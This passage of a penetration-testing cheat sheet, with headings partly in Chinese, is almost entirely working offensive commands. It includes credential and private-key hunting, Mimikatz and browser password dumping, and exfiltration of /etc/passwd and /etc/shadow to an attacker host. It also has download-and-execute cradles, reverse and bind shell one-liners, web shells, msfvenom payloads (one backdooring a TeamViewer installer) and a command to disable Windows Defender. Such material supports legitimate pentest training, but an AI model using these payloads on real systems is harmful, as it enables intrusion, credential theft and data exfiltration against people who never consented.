$ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done
$ find /home/* -type f -name "*.txt" -o ! -name "*.*"
$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done
$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done
$ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done
```
- Grep
```
$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
$ grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null
```
- Cron
```
$ cat /etc/crontab
$ ls -la /etc/cron.*/
$ cat /etc/cron.daily
$ cat /etc/cron.hourly
$ cat /etc/cron.monthly
$ cat /etc/cron.weekly
$ cat /etc/cron.d
```
- Mimipenguin
```
$ python3 mimipenguin.py
$ bash mimipenguin.sh
```
- LaZagne
```
$ python2.7 lazagne.py all
$ python3 lazagne.py browsers
C:\> start LaZagne.exe all
```
- Firefox Credentials
```
$ ls -l .mozilla/firefox/ | grep default
$ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
```
- Firefox_decrypt
```
https://github.com/unode/firefox_decrypt
$ python3.9 firefox_decrypt.py
```
- Decrypt Chrome Passwords
```
https://github.com/ohyicong/decrypt-chrome-passwords
```
- Mimikatz
```
C:\> mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # lsadump::lsa /patch
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
mimikatz # kerberos::list
mimikatz # kerberos::list /export
mimikatz # kerberos::purge
mimikatz # sekurlsa::credman
mimikatz # vault::cred
mimikatz # sekurlsa::ekeys
mimikatz # misc::cmd
```
- DPAPI
```
C:\> mimikatz.exe
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
```
- Opasswd Old Passwords
```
$ sudo cat /etc/security/opasswd
```
- Bash History
```
$ cat .bash_history
```
- Bashrc
```
$ cat .bashrc
```
- Bash Profile
```
$ cat .bash_profile
```

## #8. - File Transfers

- Base64 Download (Kali -> Windows)
```
$ md5sum id_rsa
$ cat id_rsa |base64 -w 0;echo
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String(""))
PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
```
- Base64 Download (Kali -> Linux)
```
$ md5sum id_rsa
$ cat id_rsa |base64 -w 0;echo
$ echo -n '' | base64 -d > id_rsa
$ md5sum id_rsa
```
- Base64 Upload (Windows -> Kali)
```
PS C:\> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
$ echo | base64 -d > hosts
$ md5sum hosts
```
- Base64 Upload (Linux -> Kali)
```
$ md5sum id_rsa
$ cat id_rsa |base64 -w 0;echo
$ echo -n '' | base64 -d > id_rsa
$ md5sum id_rsa
```
- Netcat Download (Kali -> Windows)
```
$ sudo nc -nlvp -q 0 443 < file.txt
C:\> nc.exe -nv 443 > file.txt
$ sudo nc -nlvp 443 > file.txt
C:\> nc.exe -q 0 443 < file.txt
```
- Ncat Download (Kali -> Linux)
```
$ sudo ncat -nlvp 443 --send-only < file.txt
$ ncat 443 --recv-only > file.txt
OR
$ cat < /dev/tcp//443 > file.txt
$ sudo ncat -nlvp 443 --recv-only > file.txt
$ ncat --send-only 443 < file.txt
```
- Netcat Upload (Windows -> Kali)
```
C:\> nc.exe -nlvp 443 -q 0 < file.txt
$ nc -nv 443 > file.txt
C:\> nc.exe -nlvp 443 > file.txt
$ nc -q 0 443 < file.txt
```
- Python Web Upload (Linux -> Kali)
```
$ sudo python3 -m pip install --user uploadserver
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
$ mkdir https && cd https
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
$ curl -X POST https:///upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```
- Python3 Server (Kali -> Windows/Kali)
```
$ python3 -m http.server 8000
$ wget http://:8000/exploit.sh -O exploit.sh
$ curl http://:8000/exploit.sh -o exploit.sh
$ curl http://:8000/exploit.sh | bash
```
- Python3 Download (Kali -> Linux)
```
$ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
```
- Python3 Upload (Linux -> Kali)
```
$ python3 -m uploadserver
$ python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
```
- Python2.7 Server (Kali -> Windows/Kali)
```
$ python2.7 -m SimpleHTTPServer 8000
$ wget http://:8000/exploit.sh -O exploit.sh
$ curl http://:8000/exploit.sh -o exploit.sh
$ curl http://:8000/exploit.sh | bash
```
- Python2.7 Download (Kali -> Linux)
```
$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
```
- PHP Server (Kali -> Linux)
```
$ php -S 0.0.0.0:8000
$ wget http://:8000/exploit.sh -O exploit.sh
$ curl http://:8000/exploit.sh -o exploit.sh
$ curl http://:8000/exploit.sh | bash
```
- PHP Download (Kali -> Linux)
```
$ php -r '$file = file_get_contents("http://:8000/exploit.sh"); file_put_contents("exploit.sh",$file);'
$ php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
$ php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```
- Ruby Server (Kali -> Linux)
```
$ ruby -run -ehttpd . -p8000
$ wget http://:8000/exploit.sh -O exploit.sh
$ curl http://:8000/exploit.sh -o exploit.sh
$ curl http://:8000/exploit.sh | bash
```
- Ruby Download (Kali -> Linux)
```
$ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
```
- Perl Download (Kali -> Linux)
```
$ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
```
- SCP Download (Kali -> Windows)
```
$ sudo systemctl enable ssh
$ sudo systemctl start ssh
$ scp @:/tmp/exploit.exe C:\Temp\exploit.exe
```
- SCP Download (Kali -> Linux)
```
$ sudo systemctl enable ssh
$ sudo systemctl start ssh
$ scp @:/tmp/exploit.sh .
```
- SCP Upload (Windows -> Kali)
```
C:\> scp C:\Temp\exploit.exe @:/tmp/exploit.exe
```
- SCP Upload (Linux -> Kali)
```
$ scp /tmp/exploit.sh @:/tmp/exploit.sh
```
- OpenSSL Download (Kali -> Linux)
```
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
$ openssl s_client -connect :80 -quiet > LinEnum.sh
```
- OpenSSL Encrypted Download (Kali -> Linux)
```
$ openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
$ openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
```
- Nginx Upload (Linux -> Kali)
```
$ sudo mkdir -p /var/www/uploads/SecretUploadDirectory
$ sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
# Create the Nginx configuration by creating the file /etc/nginx/sites-available/upload.conf with the following content
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
$ sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
$ sudo systemctl restart nginx.service
$ tail -2 /var/log/nginx/error.log
$ ss -lnpt | grep 80
$ ps -ef | grep
$ sudo rm /etc/nginx/sites-enabled/default
$ curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
$ sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt
```
- PowerShell DownloadFile (Kali -> Windows)
```
PS C:\> (New-Object Net.WebClient).DownloadFile('http://:8000/exploit.ps1','C:\Users\Public\Downloads\exploit.ps1')
C:\> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http:///exploit.exe','C:\Users\Offsec\Desktop\new-exploit.exe')"
```
- PowerShell Invoke-WebRequest (Kali -> Windows)
- PowerShell WinHTTPRequest (Kali -> Windows)
```
PS C:\> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\> $h.open('GET','http:///nc.exe',$false);
PS C:\> $h.send();
PS C:\> iex $h.ResponseText
```
- Msxml2 (Kali -> Windows)
```
PS C:\> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\> $h.open('GET','http:///nc.exe',$false);
PS C:\> $h.send();
PS C:\> iex $h.responseText
```
- PowerShell DownloadString (Download & Execute Cradle - Fileless) (Kali -> Windows)
```
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://:8000/exploit.ps1')
https://gist.github.com/HarmJ0y/bb48307ffa663256e239
```
- PowerShell Web Upload (Windows -> Kali)
```
$ pip3 install uploadserver
$ python3 -m uploadserver
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\> Invoke-FileUpload -Uri http:///upload -File C:\Windows\System32\drivers\etc\hosts
```
- PowerShell Base64 Web Upload (Windows -> Kali)
```
PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://:443/ -Method POST -Body $b64
$ nc -nlvp 8000
$ echo | base64 -d -w 0 > hosts
```
- PowerShell Remoting (Windows -> Windows)
```
PS C:\> Test-NetConnection -ComputerName -Port 5985
PS C:\> $Session = New-PSSession -ComputerName
PS C:\> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
PS C:\> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination
C:\ -FromSession $Session ``` - PowerShell 加密下载 (Kali -> Windows) ``` # https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1 PS C:\> Import-Module .\Invoke-AESEncryption.ps1 PS C:\> Invoke-AESEncryption -Mode Encrypt -Key "" -Path .\scan-results.txt ``` - SMB 下载 (Kali -> Windows) ``` $ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test C:\> net use n: \\\smbshare /user:test test C:\> copy n:\exploit.exe OR C:\> copy \\\a\whoami.exe C:\Windows\Temp\whoami.exe OR $ smbserver.py a /usr/share/windows-binaries/ $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support MyShare /tmp C:\> move sam.save \\\MyShare ``` - SMB 上传 WebDav (Windows -> Kali) ``` $ sudo pip3 install wsgidav cheroot $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous C:\> dir \\\DavWWWRoot C:\> copy C:\Users\Public\Downloads\exploit.exe \\\DavWWWRoot\ ``` - FTP 下载 (Kali -> Windows) ``` $ sudo pip3 install pyftpdlib $ sudo python3 -m pyftpdlib --port 21 PS C:\> (New-Object Net.WebClient).DownloadFile('ftp:///file.txt', 'C:\Users\Public\ftp-file.txt') ``` - FTP 上传 (Windows -> Kali) ``` $ sudo python3 -m pyftpdlib --port 21 --write PS C:\> (New-Object Net.WebClient).UploadFile('ftp:///ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` - FTP 下载(非交互式) (Kali -> Windows) ``` C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo GET file.txt >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. 
ftp> USER anonymous ftp> GET file.txt ftp> bye C:\>cat file.txt This is a test file ``` - FTP 上传(非交互式) (Windows -> Kali) ``` C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ``` - Wget (Kali -> Linux) ``` $ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh $ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 ``` - Curl (Kali -> Linux) ``` $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /tmp/LinEnum.sh $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash ``` - Bash (/dev/tcp) (Kali -> Linux) ``` $ exec 3<>/dev/tcp/10.10.10.32/80 $ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 $ cat <&3 ``` - Bitsadmin (Kali -> Windows) ``` C:\> bitsadmin /transfer n http:///exploit.exe C:\Temp\exploit.exe PS C:\> bitsadmin /transfer wcb /priority foreground http://:8000/nc.exe C:\Users\Administrator\Desktop\nc.exe PS C:\> Import-Module bitstransfer; Start-BitsTransfer -Source "http://:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" PS C:\> Import-Module bitstransfer; PS C:\> Start-BitsTransfer 'http:///nc.exe' $env:temp\t; PS C:\> $r=gc $env:temp\t; PS C:\> rm $env:temp\t; PS C:\> iex $r ``` - CertReq (https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe) (Windows -> Kali) ``` C:\> certreq.exe -Post -config http://:8000/ c:\Temp\exploit.exe $ sudo nc -lvnp 8000 ``` - Certutil (Kali -> Windows) ``` C:\> certutil.exe -urlcache -split -f http:///exploit.exe C:\> certutil.exe -verifyctl -split -f http:///exploit.exe ``` - GfxDownloadWrapper.exe (Kali -> Windows) ``` PS 
C:\> GfxDownloadWrapper.exe "http:///nc.exe" "C:\Temp\nc.exe" ``` - JavaScript (cscript.exe) 下载 (Kali -> Windows) ``` # 保存为 wget.js var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); C:\> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 ``` - VBScript (cscript.exe) 下载 (Kali -> Windows) ``` # 保存为 wget.vbs dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with C:\> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 ``` - Rdesktop (Windows -> Windows) ``` $ rdesktop -d -u -p '' -r disk:linux='/home/user/rdesktop/files' Browse to \\tsclient\ or use mstsc.exe -> Local Resources -> More -> Drives ``` - Xfreerdp (Windows -> Windows) - HTTP User-Agents ``` https://useragentstring.com/index.php https://useragentstring.com/pages/useragentstring.php PS C:\>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl PS C:\> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome PS C:\> Invoke-WebRequest http:///nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` - SMBClient 批量下载脚本 ``` SERVER="" USER="\\" PASS="" for share in $(smbclient -L $SERVER -U $USER%$PASS 2>/dev/null | awk '/Disk/ {print $1}'); do echo "[+] Downloading $share ..." 
mkdir -p "$share" smbclient //$SERVER/$share -U $USER%$PASS -c "recurse ON; prompt OFF; lcd \"$share\"; mget *" done ``` ## #9. - 受限 Shell 逃逸 - Shell 逃逸 ``` $ /bin/sh -i $ bash -i $ echo os.system('/bin/bash') $ python -c 'import pty; pty.spawn("/bin/bash")' $ python3 -c 'import pty;pty.spawn("/bin/bash")' $ script /dev/null -c bash $ perl —e 'exec "/bin/sh";' $ perl: exec "/bin/sh"; $ ruby: exec "/bin/sh" $ lua: os.execute('/bin/sh') $ awk 'BEGIN {system("/bin/sh")}' $ find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; $ find . -exec /bin/sh \; -quit $ vim -c ':!/bin/sh' ``` - Tab 自动补全 ``` $ CTRL+Z $ stty raw -echo $ fg $ reset $ export TERM=xterm-256color $ stty rows 67 columns 318 ``` ## #10. - Shell - 绑定 Shell ``` https://www.revshells.com/ $ nc -nlvp -e /bin/bash $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f $ python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("",));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' $ powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); ``` - 反向 Shell ``` https://www.revshells.com/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md $ nc -nv -e /bin/bash 
msf6 > use multi/handler $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' $ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 $ socat file:`tty`,raw,echo=0 tcp-listen:4444 $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::4444 msf> use exploit/multi/handler ``` - Web Shell ``` https://github.com/jbarcia/Web-Shells/tree/master/laudanum https://github.com/samratashok/nishang/tree/master/Antak-WebShell https://github.com/WhiteWinterWolf/wwwolf-php-webshell PHP: JSP: <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP: <% eval request("cmd") %> ``` - 默认 Webroot 位置 ``` Apache: /var/www/html/ Nginx: /usr/local/nginx/html/ IIS: c:\inetpub\wwwroot\ XAMPP: C:\xampp\htdocs\ ``` - MSFvenom ``` http://pentestmonkey.net/tools/web-shells/php-reverse-shell Edit IP address and port $ msfvenom -l payloads $ msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php $ msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= 
-f raw > shell.jsp $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o shell.exe $ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell.elf $ msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho $ msfvenom windows/x86/meterpreter_reverse_tcp LHOST= LPORT= -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 ``` ## #11. - 绕过 - 禁用 Windows Defender ``` PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true ``` ## #12. - 在线资源 - Speedguide ``` https://www.speedguide.net/port.php?port=3389 ``` - CrackStation ``` https://crackstation.net/ ``` - Living Off The Land Binaries, Scripts and Libraries (LOLBAS) ``` https://lolbas-project.github.io/ ``` - GTFOBins ``` https://gtfobins.github.io/ ``` ## #13. - 浏览器插件 - Wappalyzer: 网站技术分析器 ``` https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ ``` - Cookie 编辑器:编辑 Cookie ``` https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ ``` - FoxyProxy:代理管理 ``` https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ ``` ## #14. - 利用工具 - MS17-010 ``` https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py $ ./zzz_exploit.py ntsvcs https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py https://github.com/3ndG4me/AutoBlue-MS17-010 ``` - MS08-067 ``` https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py ``` - CVE-2007-2447 ``` https://github.com/amriunix/CVE-2007-2447 ``` - PHP 8.1.0-dev 后门远程代码执行 ``` https://github.com/flast101/php-8.1.0-dev-backdoor-rce ``` - CVE-2021-4034 ``` https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py ``` ## #15. 
- 利用研究 - CVEdetails ``` https://www.cvedetails.com/ ``` - Exploit DB ``` https://www.exploit-db.com/ ``` - Vulners ``` https://vulners.com/ ``` - Rapid7 ``` https://www.rapid7.com/db/ ``` - 漏洞实验室 ``` https://www.vulnerability-lab.com/ ``` - Packet Storm Security ``` https://packetstormsecurity.com/ ``` - NIST ``` https://nvd.nist.gov/vuln/search?execution=e2s1 ```